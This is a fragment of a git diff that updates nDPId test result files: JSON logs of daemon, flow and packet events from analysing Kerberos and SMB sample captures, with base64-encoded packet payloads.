+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946724453221,"flow_last_seen":946724453222,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1555,"flow_tot_l4_payload_len":6218,"flow_avg_l4_payload_len":414,"midstream":0,"thread_ts_msec":946724453222,"l3_proto":"ip4","src_ip":"192.168.10.12","dst_ip":"192.168.10.3","src_port":44256,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"}} 
00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":39,"source":"kerberos-login.pcap","alias":"nDPId-test","packets-captured":39,"packets-processed":39,"total-skipped-flows":0,"total-l4-data-len":35242,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":13,"total-detection-updates":1,"total-updates":0,"current-active-flows":0,"total-active-flows":13,"total-idle-flows":13,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":71,"global_ts_msec":946724453222} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 39/39
diff --git a/test/results/kerberos.pcap.out b/test/results/kerberos.pcap.out
index b5029adc4..3d7a9f500 100644
--- a/test/results/kerberos.pcap.out
+++ b/test/results/kerberos.pcap.out
@@ -1,194 +1,194 @@ 00459{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"kerberos.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00545{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1549337929790} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00774{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":293,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":293,"pkt_l4_len":259,"thread_ts_msec":1549337929790,"pkt":"pB9ywglqAAgCHEeuCABFAAEXABdAAIAGkNisEAjJrBAICMAFAFiynbRHbznTnlAYAQAf5QAAAAAA62qB6DCB5aEDAgEFogMCAQqjFTATMBGhBAICAICiCQQHMAWgAwEB\/6SBwTCBvqAHAwUAQIEAEKEYMBagAwIBAaEPMA0bC2pvaG5zb24tcGMkohAbDmhhcHB5Y3JhZnQub3JnoyMwIaADAgECoRowGBsGa3JidGd0Gw5oYXBweWNyYWZ0Lm9yZ6URGA8yMDM3MDkxMzAyNDgwNVqmERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7AFheoFTATAgESAgERAgEXAgEYAgL\/eQIBA6kdMBswGaADAgEUoRIEEEpPSE5TT04tUEMgICAgICA="} -00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":239,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
-00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":332,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":332,"pkt_l4_len":298,"thread_ts_msec":1549337929790,"pkt":"AAgCHEeupB9ywglqCABFAAE+ExRAAIAGfbSsEAgIrBAIyQBYwAVvOdOesp21NlAYAQCkkQAAAAABEn6CAQ4wggEKoAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OFqlBQIDBjUgpgMCARmpEBsOaGFwcHljcmFmdC5vcmeqIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnrIGnBIGkMIGhMH6hAwIBE6J3BHUwczA0oAMCARKhLRsrSEFQUFlDUkFGVC5PUkdob3N0am9obnNvbi1wYy5oYXBweWNyYWZ0Lm9yZzAFoAMCARcwNKADAgEDoS0bK0hBUFBZQ1JBRlQuT1JHaG9zdGpvaG5zb24tcGMuaGFwcHljcmFmdC5vcmcwCaEDAgECogIEADAJoQMCARCiAgQAMAmhAwIBD6ICBAA="} -00729{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929790,"flow_last_seen":1549337929790,"flow_idle_time":7440000,"flow_min_l4_payload_len":239,"flow_max_l4_payload_len":278,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":258,"midstream":1,"thread_ts_msec":1549337929790,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49157,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00882{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1549337929811,"pkt":"pB9ywglqAAgCHEeuCABFAAFnABtAAIAGkISsEAjJrBAICMAGAFganBtaQ2U1slAYAQDaGgAAAAABO2qCATcwggEzoQMCAQWiAwIBCqNjMGEwTKEDAgECokUEQzBBoAMCARKiOgQ4YERcga5zFfjuo7+oqo0hJ6Udj7efOwOKKYJj6PKpxuETgzDcdt27IvGW9sEQ18QPUV\/drVuLVBwwEaEEAgIAgKIJBAcwBaADAQH\/pIHBMIG+oAcDBQBAgQAQoRgwFqADAgEBoQ8wDRsLam9obnNvbi1wYySiEBsOaGFwcHljcmFmdC5vcmejIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDmhhcHB5Y3JhZnQub3JnpREYDzIwMzcwOTEzMDI0ODA1WqYRGA8yMDM3MDkxMzAyNDgwNVqnBgIETsAWF6gVMBMCARICARECARcCARgCAv95AgEDqR0wGzAZoAMCARShEgQQSk9ITlNPTi1QQyAgICAgIA=="} 
-00721{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929811,"flow_last_seen":1549337929811,"flow_idle_time":7440000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":319,"flow_tot_l4_payload_len":319,"flow_avg_l4_payload_len":319,"midstream":1,"thread_ts_msec":1549337929811,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49158,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"johnson-pc","domain":"happycraft.org","username":""}} -00610{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1549337929812,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":166,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":166,"pkt_l4_len":132,"thread_ts_msec":1549337929812,"pkt":"AAgCHEeupB9ywglqCABFAACYExlAAIAGflWsEAgIrBAIyQBYwAZDZTtmGpwcmVAYAQDnsgAAX5hri3Z\/opje40K53kwDKo2\/CTegm0pJkWpLVNFlnn\/MakUFXqKHv4CDtH2CbQqvJq\/ecJgxH2EwrzVmUcQk2zqXXjIwbkyszZ9\/Xc6IEgQ4qiI64lPzINS7ueVTbdUXk\/8v52QxoGdMilBjjWTAcQ=="} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929815,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337929815,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49159,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00636{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337929815,"pkt":"pB9ywglqAAgCHEeuCABFAACxACFAAIAGkTSsEAjJrBAICMAHAFgBsoC8gS4auFAYAQDUqQAAiNeE+tCJIo9Cz1KFHGicigIlxkFIEVkb70vifDKvvi6NwB24GlkehWdocuUvESpeAqtSofWtuKDm2yskVOheE+r4DxaQxRLncJy9zYBP+p7ofQvBukmarkg+oY3ctA8jgj5BSy2yi42NlxJjhcjuX3ByLG+GD20zq41Le0TbPh0TFS5qkRb0Q24="} -00611{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1549337929815,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337929815,"pkt":"AAgCHEeupB9ywglqCABFAACbEx9AAIAGfkysEAgIrBAIyQBYwAeBLiBsAbKBRVAYAQBP\/wAA1H56bb56rLTzhI\/so6pGl6jILu03bHY2ZWl4A41JY07Kavo1sQRKhlNPx3vE\/LdSF6BX6NLW1Fm3Tdmvr7ZEbPWOq8FZs9c0RBY7wJbwPUW44FlC0vhqJn1yGB3K1Fxl0gPqAAMzMrhupJQMQzjV4fgdag=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02387{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337929816,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/ACZAAIAGjCGsEAjJrBAICMAIAFgkzleN\/pyBM1AYAQCd1QAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1l4LwpNuTjPo\/WSca61wgawIInNQ2vTGqwCxtV1QigPfApKXxUIq16oPsvd5TUFFBoZ3psSaal0IeVBLFx\/BX1XOMXvlpVRB9MsTpZwTQ9ax1GLB6I2i5bbUZpknsnBAKrSXL695P06nXI2pxBPckcoFwJAlSBEmG2XByE8IS7rO1EarXMbJ6Y6aTY3qAJfaaRab4vHhRG2Vuf+5JWuR5w1NLPXeeoD\/rArSk0gCVLkR21SKfZcS\/vqPldqO0np7TLmMBVoYjsl6PiI0+4z2cMBft\/qbxRIxb8y1vWhjoJ64ue7lCoT2cvFOdVWD\/WH\/fANzw0ML9F0vLIXCgI1qi1sWcerxATeYpOyo7DWpsJioH9jxAPx+B6RM+9U5zQIKM9BdT3C3olrkQMfOua6FPtyqIt9kVcakdowBTS4+NidzK5sGlYIRntlAxGR8YU5brzwGdboEMfsAHK11qtTE6t\/tDmgr1+cFgW34p7q9yjtfw3IlMfNtNF6cVYmOh6G5Wnxcfjqbsrpj7Kw6mjBwfKtaYNJG6XthlVKo9I4FpdysFIteChs2N+mQtafp0AWZxKjjDKO8sohbJklYhyoJOto52hds26FAU4LmrIc5fMmADp1PG\/tBDi0BnZ3SimtoeWyM2fnwWhBrH67Gc6TeKPHSeyVFwR1fSnMxZTlzS7KXwLa62U6BZ0WNCBZzIdUTje6\/aUFTq4XeeR0Z7Vh6Z9DZ9om\/9wiQsBPMMalPRPnqfmOZT7HV5yr74UqmbVg1OWh8En3RVYoEzl+U9UxwXXFIR5zUwJrSv4BRCrfouK2f87lMtCFEg\/zEl+Ya6jB+A9XZfPbLOpJ+x1ZsBKiE7MFw9X4cPsiIvoIaHcwmirVOaa9JrhuL72qg0GrV2LWFm+xJt5NjWGhgRHFok1jp2URmHs7J3zvdeb+nbPHLvYUdtkqwb3aoYEr1Xmflw8UpDr6MDbT2en\/\/11z39903bvFGohUv62WN4swCRiY9JjXJUs610D4Xxus5+CL0zgzTQQAxEvC4LL9CQELhrXgdhbQmsotNytXnsgYuKhF4RMS5q5UH8sx1AGsmSntAJ\/W4iO+\/MbV3oU5HdPpcERFm3hfRy\/GBSS75vadxxOcRHZA6iF9\/pQ9BlFHhHcWkaQuZyUL6qH1sbSQyui0sXjtHojjpnPlsTpEM9hpMt6LhooASI6ATNe\/Xw7kB+HTJthDR\/bJnXbftcEdtnk7dLQYL5MfhSH8BDyuI9MMLmdpozP+V7mPT5HhUnsqRSQWCVyfiuDhL0shZpk8
3f0xNTTmK8fhSYF8Q1BGkgZwwgZmgAwIBEqKBkQSBjpT6WKZ4R5UUi5WTtSgEkEd7jMLa6AoUPu4TwrcLKGcmB9vngXIzOhZvqCgHdzOkHetRjgLUyTIXem1PFxz6mY8TxQcIZDyb19SN3Nd3sKaxs2IYEv7YHwXG6E8LM8hJLH2m\/TyiwnWxB70uZ574gAkF4FD1Zq+qMVWQ8VxsOQkGL92ElZ2TaAS4GGYCEnUwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE7NBe6oBTADAgES"} -00715{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
-02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337929816,"pkt":"AAgCHEeupB9ywglqCABFAAXMEyNAAIAGeResEAgIrBAIyQBYwAj+nIEzJM5dJFAYAQC28wAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9ZmgNa1dr3wGd87q5o3XWLsTIWysbTgkwJr+Tn54CyV4AH6vlEgusASRdJcyvN0onPWOO9TStPkihUEobLQ8WG5\/BAe\/pJm76NJeRjK9kGGi8G\/0XbFCYSPepa5PQwmUgAjsgxX98uOoIoeMgpxrDD2I4YnqT0o9T7E4u8XbTiIf+v3cdcN4dCZ+EoTKAM9GSdtpSP62\/Xb+2PxUXMWzXRKdBV4GPRc7M\/f3KRdK529+2pM4yLgF6mfdzw1YttOYiTQBSOIseZU5L5pWWwIAYUeadQLWeGW7MCmuOiezPfzHOKXT\/hMqEB\/2Egds2KA7Hm\/oP01r9IU6p42tCtn+I4EWSm5ZkiMAIXP6SCiOdO2PbdtR\/4GK9kZARZpgtLJG+aGmFpRzNAdcgcLMHN2OlX0J6+piruBM7Ww3kqLpZgruCuGx8K+d\/8FApmAeWnLmXbD3fu1T00fGd6fdKrkgCl98Sy4I0iKgJr019SubVPh\/tLfXvOPHFTskrZiab\/lkJMa\/lcaCHUWtHfBuxSsNJt7gody42oqvvYHikEn7VlQJDi\/u8KzU07HljjjoqhCYV678B3YcCsVdGefRzEoUzSdH\/BYJGW+CkosfzR7MiRBWyvn77tCF67oxZ3T5EhVst6OUOt05ejCBeF0j2P8Sa6RL1vPg6TCt7KX5yXzGdJtuRQYFzwHms4Ux+JYQXrmLh2ixoc55gWooUap7xcPOrj9EtgR7efu2PqGQVuytvq6rdV+3QUFA8AufxbPXK507+RBmLMcLcxZAxOp7SQc\/Ay3c\/ORhr+fWLV6VFfX75zufwBySCOGvrbuFXK0SnMVFwylor3lGY2Czl7Y5QKDcK4+FS+SJKTqaxj0EFxa2D+DbGLwbVt3zt9+tPhI+pr7vL0LtIL0O055Y3MLTTiVoB4FnEuGzQivRnPbXzFFcdCIUDcAh26XtB4LCpmd+fBTcLafa5ZKQ2nsR\/2LH7kpZxim50Hcvtyd5PzGPwKSVk2Q+psnZ0IehfsbwhALTs\/RQSOb7Rq41AGgy7OAH5YvpBKSd7qUDfb1gtLh6EIYhMprEuGvAg42lOnEYktaA8Y0X4PyM72xSTA9ZN+CxfcvwiIlvHf11TL5C5ZRBUy3du\/RJjPcfxsjqIdqVfXMDys4DGOvXOODvANQyMdpD2WSRWTBduQ+1useq7xNugt3rmAScfUohAT\/giN4TexFk96WUfGs376rRqExitzbuece0s6lptdaN+3sKDC1NFILlW4MQPBHpc3ComgefM9jAmeqLxMUur1iJW82d2i1F5BNiRpTZ
EFf7MD9poIBJjCCASKgAwIBEqKCARkEggEVQDvO7+WVQbXswJT\/WKenjoLOTOUb7xtnQSDSvTALA7cFBjKmG7py2Ll3YHsUrZQaKL2ZgS2bNcKYx\/3+lfvv+kAlvcN39ExBH9j9AGm8H1cRnFwNhRWCETnioXg\/P1Y2p+e3F0h6bOneEdLiePwHJv9FonrRV61HKyJDpzH6E0h5BR7t2eo\/60DJORIRuiguwoofBgNuIj9IIWatzAufVetcbqrWIpOgXa8Tl5itQ\/bI2zF6hwUS3TRThkmm+Lz7J7LBceoySEetzaEsRZtQYN6tENYmlD5+VEJvmJ\/Gk593lHeRAE07ZMXwY1fmEib\/vL\/sBgCUMH7CIYMAL4GjstMrJCbIeZhyoYmoahgOuedSq46aMw=="} -00733{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":8,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337929816,"flow_last_seen":1549337929816,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337929816,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49160,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} -00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929817,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337929817,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49156,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00760{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1549337929817,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337929817,"pkt":"pB9ywglqAAgCHEeuCABFAAELACpAAIAGkNGsEAjJrBAICMAEAb1XsKRSOc8tT1AYAP5XOQAAtEaCpoUNMQEcRu8rXL+flRkpXPhHudnte7juaoAeTLu\/yTOr\/klMHDKYHSz0JIIsigIVsBaMl3PyJLoeb\/thjoYGSwkEC2m4nRdpRXAof0BuI3WnXPinh7MhPVCaTGyJNfqfVu\/1dc4+HXKYy76MWWV4zUtzQAeAZlVdIbuoLUlvFXjFSw5Ryb7lDA5ay5XLMnQY1U2bYUt6MYxBsLvHXZpUwBGPjxstpVTddlgnyYV1MOsJQv5Du0utIGTzTo6LpQrGUrUbi+j64I7Cmr+KeRuwdhEzhGbc+mJlwRYjD6cvIxA="} -00808{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1549337929818,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337929818,"pkt":"AAgCHEeupB9ywglqCABFAAEsEydAAIAGfbOsEAgIrBAIyQG9wAQ5zy1PV7ClNVAYAQBD3AAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAIAAAAAAAAA\/\/4AAAAAAABZAAAAAAQAAM9KX1xrFqd60K9wkt\/rc1cJAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbaDd4i7\/ItyR1a9jC52avEiTOhersM4IXB2s8eeK3O+ftonNzS3toSakh8sE2tBVm3gbqMBKq1zSZzBBR6cu+Hrjxp\/3xoJEFPVC\/4y\/BWmosce7zt2RHazTIcgt7F0qD+5oY0gWkTgMB+VU0Ro="} 
-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337929981,"flow_last_seen":1549337929981,"flow_idle_time":7440000,"flow_min_l4_payload_len":153,"flow_max_l4_payload_len":153,"flow_tot_l4_payload_len":153,"flow_avg_l4_payload_len":153,"midstream":1,"thread_ts_msec":1549337929981,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49162,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00661{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":11,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1549337929981,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1549337929981,"pkt":"pB9ywglqAAgCHEeuCABFAADBADZAAIAGkQ+sEAjJrBAICMAKAFgVCzarRRAS7FAYAQB2LAAAqoGWMIGToAMCARKigYsEgYi0+C7lIM6lpWfLcf2ezyusajpC0TYc1OX1vmb3DhkyjRtC5TeZRg9Wzt\/ubCTSXWpwv+zrJOhZpUKxM\/PhogQbKSmJJuvTC3n4CxJc9SponZNFKF1Kt9\/yiDsesCZaEKdbgZEf1rZ1aHAiihciexKw\/Qr8RPyDjBEhr0yc0K8+XP7zeT3kqKdm"} -00621{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1549337929983,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":180,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":180,"pkt_l4_len":146,"thread_ts_msec":1549337929983,"pkt":"AAgCHEeupB9ywglqCABFAACmEzJAAIAGfi6sEAgIrBAIyQBYwApFEBigFQs3RFAYAQCNWQAABoWQU5dMx7s3k7lFXcqa6uoE3YqM179MtGFm5Pp0PzGMSHM6ikhCYuxEbF8vf630PDV4M+ymDkgmnA6LZ83pNOsEhGLNGEwQsGjuja+QpA2dd9fjedDg4z2eYZ9DeqXNfMVtviu+Fd00prhwc+9nnU9I900bDPmSAhZM9lsL"} 
